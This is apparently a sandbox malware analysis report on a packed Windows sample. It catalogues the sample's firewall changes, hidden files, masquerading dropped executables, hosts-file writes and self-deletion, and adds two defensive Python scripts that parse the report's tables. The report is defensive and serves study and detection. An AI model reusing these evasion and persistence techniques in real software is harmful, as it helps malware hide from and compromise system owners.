Malware Analysis Report

2024-12-07 14:39

Sample ID 241012-r5s5bazgjr
Target 0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N
SHA256 0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0
Tags
defense_evasion discovery evasion exploit persistence privilege_escalation upx
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0

Threat Level: Likely malicious

The file 0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion discovery evasion exploit persistence privilege_escalation upx

Modifies Windows Firewall

Possible privilege escalation attempt

Sets file to hidden

Drops file in Drivers directory

Executes dropped EXE

Loads dropped DLL

Modifies file permissions

Deletes itself

Indicator Removal: File Deletion

UPX packed file

Drops file in Windows directory

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Runs net.exe

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-12 14:46

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-12 14:46

Reported

2024-10-12 14:49

Platform

win7-20240903-en

Max time kernel

118s

Max time network

26s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe"

Signatures

Drops file in Drivers directory

Description Indicator Process Target
File created \??\c:\windows\system32\drivers\etc\hosts C:\Windows\Fonts\banbecud\Wscntfy.exe N/A
File created \??\c:\windows\system32\drivers\etc\hosts_bak C:\Windows\Fonts\banbecud\Wscntfy.exe N/A
File opened for modification \??\c:\windows\system32\drivers\etc\hosts_bak C:\Windows\Fonts\banbecud\Wscntfy.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A (35 identical rows: 35 separate netsh.exe invocations; no rule details recorded)

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A (5 identical rows: 5 attrib.exe invocations)

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe N/A

Indicator Removal: File Deletion

defense_evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A (8 identical rows: 8 UPX-packed PE matches)

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\common files\system\wk.ini C:\Windows\system32\attrib.exe N/A
File created C:\Program Files\common files\system\jk.ini C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe N/A
File opened for modification C:\Program Files\common files\system\jk.ini C:\Windows\system32\attrib.exe N/A
File created C:\Program Files\ls.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\jakbpcjd C:\Windows\system32\attrib.exe N/A
File created C:\Program Files\common files\system\wk.ini C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Fonts\banbecud\Wscntfy.exe C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe N/A
File opened for modification C:\Windows\Fonts\banbecud C:\Windows\system32\attrib.exe N/A
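The three file tables above (Drivers, Program Files and Windows directory) are enough to reconstruct the drop chain: the submitted sample writes dwm.exe under Common Files\Microsoft Shared, dwm.exe writes Wscntfy.exe under C:\Windows\Fonts plus two .ini files, and Wscntfy.exe then creates hosts and hosts_bak under drivers\etc (the report does not show the hosts contents, so the file itself has to be read on an infected host). The dropped names copy legitimate Windows binaries (the genuine dwm.exe lives in %SystemRoot%\System32; wscntfy.exe was the Windows XP Security Center notifier), which is the masquerading a triage script should flag. The script below is an added example, not part of the original report or the sandbox's own tooling: it parses the rows exactly as printed above (copied here as constructed input), follows "File created" edges from the sample to every executable it transitively drops, lists what wrote the hosts file, and lists the paths attrib.exe opened for modification (the targets of "Sets file to hidden"). The sample path used as chain root and the list of known System32 names are assumptions.

```python
import re

# Rows copied from the behavioral1 file tables of this report (constructed input for
# the example): "<Description> <Indicator path> <Process path> N/A".
FILE_ROWS = r"""
File created \??\c:\windows\system32\drivers\etc\hosts C:\Windows\Fonts\banbecud\Wscntfy.exe N/A
File created \??\c:\windows\system32\drivers\etc\hosts_bak C:\Windows\Fonts\banbecud\Wscntfy.exe N/A
File opened for modification \??\c:\windows\system32\drivers\etc\hosts_bak C:\Windows\Fonts\banbecud\Wscntfy.exe N/A
File opened for modification C:\Program Files\common files\system\wk.ini C:\Windows\system32\attrib.exe N/A
File created C:\Program Files\common files\system\jk.ini C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe N/A
File opened for modification C:\Program Files\common files\system\jk.ini C:\Windows\system32\attrib.exe N/A
File created C:\Program Files\ls.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\jakbpcjd C:\Windows\system32\attrib.exe N/A
File created C:\Program Files\common files\system\wk.ini C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe N/A
File created C:\Windows\Fonts\banbecud\Wscntfy.exe C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe N/A
File opened for modification C:\Windows\Fonts\banbecud C:\Windows\system32\attrib.exe N/A
"""

# Submitted sample as shown in the Command Line section (assumed to be the chain root).
SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe"

# Analyst-maintained list (assumption, not from the report): names of genuine Windows
# binaries that normally live under %SystemRoot%\System32.
SYSTEM32_NAMES = {"dwm.exe", "wscntfy.exe"}

# Both path columns may contain spaces, so split on the " C:\" that starts the process
# column instead of splitting on whitespace.
ROW_RE = re.compile(r"^(File created|File opened for modification) (.+?) (C:\\.+?) N/A$")


def norm(path):
    """Lower-case a path and strip the NT object-manager prefix so both spellings compare equal."""
    path = path.lower()
    return path[4:] if path.startswith("\\??\\") else path


def parse_rows(text):
    events = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            raise ValueError(f"unparsed row: {line!r}")
        events.append({"action": m.group(1), "path": norm(m.group(2)), "process": norm(m.group(3))})
    return events


def drop_chain(events, root):
    """Breadth-first walk over 'File created' edges: (dropper, dropped .exe) pairs, sample first."""
    root = norm(root)
    edges, frontier, seen = [], [root], {root}
    while frontier:
        parent = frontier.pop(0)
        for ev in events:
            if ev["action"] == "File created" and ev["process"] == parent and ev["path"].endswith(".exe"):
                if ev["path"] not in seen:
                    seen.add(ev["path"])
                    edges.append((parent, ev["path"]))
                    frontier.append(ev["path"])
    return edges


def masquerades(events):
    """Dropped executables that reuse a System32 binary name from a different directory."""
    hits = []
    for ev in events:
        if ev["action"] != "File created":
            continue
        directory, _, name = ev["path"].rpartition("\\")
        if name in SYSTEM32_NAMES and not directory.endswith("\\system32"):
            hits.append(ev["path"])
    return hits


def hosts_writers(events):
    """Processes that created or opened the real hosts file (not hosts_bak)."""
    return sorted({ev["process"] for ev in events if ev["path"].endswith("\\drivers\\etc\\hosts")})


def hidden_targets(events):
    """Paths attrib.exe opened for modification: the targets of 'Sets file to hidden'."""
    return [ev["path"] for ev in events if ev["process"].endswith("\\attrib.exe")]


if __name__ == "__main__":
    evs = parse_rows(FILE_ROWS)
    for parent, child in drop_chain(evs, SAMPLE):
        print(f"{parent}\n  -> drops {child}")
    print("masquerading names:", masquerades(evs))
    print("hosts file written by:", hosts_writers(evs))
    print("hidden by attrib.exe:", hidden_targets(evs))
```

Only "File created" rows build lineage; "opened for modification" rows are kept because they are what ties attrib.exe to the directories it hides. The same parser works on the corresponding tables of other reports in this format.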

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A (22 rows)
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A (22 rows)
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A (20 rows)

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A (35 rows)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A (8 rows)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A (2 rows)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A (1 row)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A (1 row)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A (1 row)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Fonts\banbecud\Wscntfy.exe N/A (1 row)

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A (35 identical rows; the value is UTF-16LE "en-US", "en")
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" C:\Windows\SysWOW64\netsh.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe N/A
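Two caveats a practitioner will want when reading the two registry tables above. First, every row in the Netsh Helper DLL table is a read (Key opened, Key queried, Key value enumerated) of HKLM\SOFTWARE\Wow6432Node\Microsoft\NetSh: netsh.exe reads that key on every start to find its helper DLLs, so the T1546.007 signature here reflects the many netsh invocations behind "Modifies Windows Firewall", not a helper registration, which would show up as a value written under that key. Second, most of the HKEY_USERS table is MuiCache resource-string caching produced as netsh loads the built-in NAP enforcement clients (dhcpqec, napipsec, eapqec, tsgqec); the rows worth reading are the three ZoneMap entries written by the dropped dwm.exe. That these writes land under HKEY_USERS\.DEFAULT is also consistent with the processes running under the LocalSystem account rather than the Admin user who launched the sample. The script below is an added example (not the report's or the sandbox's own code) that applies both filters to rows copied from the tables above as constructed input; HYPOTHETICAL_HELPER_ROW is invented to show what a real registration would look like and does not appear in this report.

```python
import re
from collections import Counter

# Rows copied from the "Event Triggered Execution: Netsh Helper DLL" and "Modifies data
# under HKEY_USERS" tables of this report (constructed input: a representative subset).
REG_ROWS = r"""
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" C:\Windows\SysWOW64\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" C:\Windows\SysWOW64\netsh.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe N/A
"""

# Constructed row, NOT from the report: what a genuine helper-DLL registration would
# look like, i.e. a value written under HKLM\SOFTWARE\Microsoft\NetSh.
HYPOTHETICAL_HELPER_ROW = r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh\helper = "%SystemRoot%\Temp\helper.dll" C:\Windows\SysWOW64\netsh.exe N/A'

# Key names and values contain spaces, so the process column is located by the " C:\"
# that starts it rather than by splitting on whitespace.
REG_RE = re.compile(
    r"^(Key opened|Key queried|Key value enumerated|Key created|Set value \(\w+\)) (.+?) (C:\\.+?) N/A$"
)
READ_ACTIONS = {"Key opened", "Key queried", "Key value enumerated"}


def parse_rows(text):
    events = []
    for line in text.strip().splitlines():
        m = REG_RE.match(line.strip())
        if not m:
            raise ValueError(f"unparsed row: {line!r}")
        events.append({"action": m.group(1), "key": m.group(2), "process": m.group(3)})
    return events


def is_write(ev):
    return ev["action"] not in READ_ACTIONS


def netsh_helper_registrations(events):
    """T1546.007 needs a value written under the NetSh key; opens, queries and
    enumerations of it are what every netsh.exe start does to find its helpers."""
    return [ev for ev in events if is_write(ev) and "\\microsoft\\netsh" in ev["key"].lower()]


def netsh_key_activity(events):
    """Read versus write counts on the NetSh key, to show at a glance why the signature fired."""
    counts = Counter()
    for ev in events:
        if "\\microsoft\\netsh" in ev["key"].lower():
            counts["write" if is_write(ev) else "read"] += 1
    return dict(counts)


def triage_writes(events):
    """Split write events into MuiCache caching (a side effect of loading DLLs, here the
    NAP enforcement clients netsh loads) and the writes that deserve a look."""
    noise, real = Counter(), []
    for ev in events:
        if not is_write(ev):
            continue
        if "\\muicache\\" in ev["key"].lower():
            noise[ev["process"]] += 1
        else:
            real.append(ev)
    return noise, real


if __name__ == "__main__":
    evs = parse_rows(REG_ROWS)
    print("NetSh key activity:", netsh_key_activity(evs))
    print("helper registrations:", netsh_helper_registrations(evs))
    noise, real = triage_writes(evs)
    print("MuiCache noise per process:", dict(noise))
    for ev in real:
        print("review:", ev["action"], ev["key"], "by", ev["process"])
    print("with constructed row:", netsh_helper_registrations(evs + parse_rows(HYPOTHETICAL_HELPER_ROW)))
```

Run against the full tables the read count is 64 and the write count 0, which is the whole basis for treating the Netsh Helper DLL signature as a by-product of the firewall changes rather than as persistence.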

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Fonts\banbecud\Wscntfy.exe N/A
N/A N/A C:\Windows\Fonts\banbecud\Wscntfy.exe N/A
N/A N/A C:\Windows\Fonts\banbecud\Wscntfy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd\Imjpmig.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Fonts\banbecud\Wscntfy.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Fonts\banbecud\Wscntfy.exe N/A
N/A N/A C:\Windows\Fonts\banbecud\Wscntfy.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2868 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 2868 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 2868 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 1636 wrote to memory of 1920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1636 wrote to memory of 1920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1636 wrote to memory of 1920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2868 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 2868 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 2868 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 836 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe
PID 836 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe
PID 836 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cacls.exe
PID 2868 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 2868 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
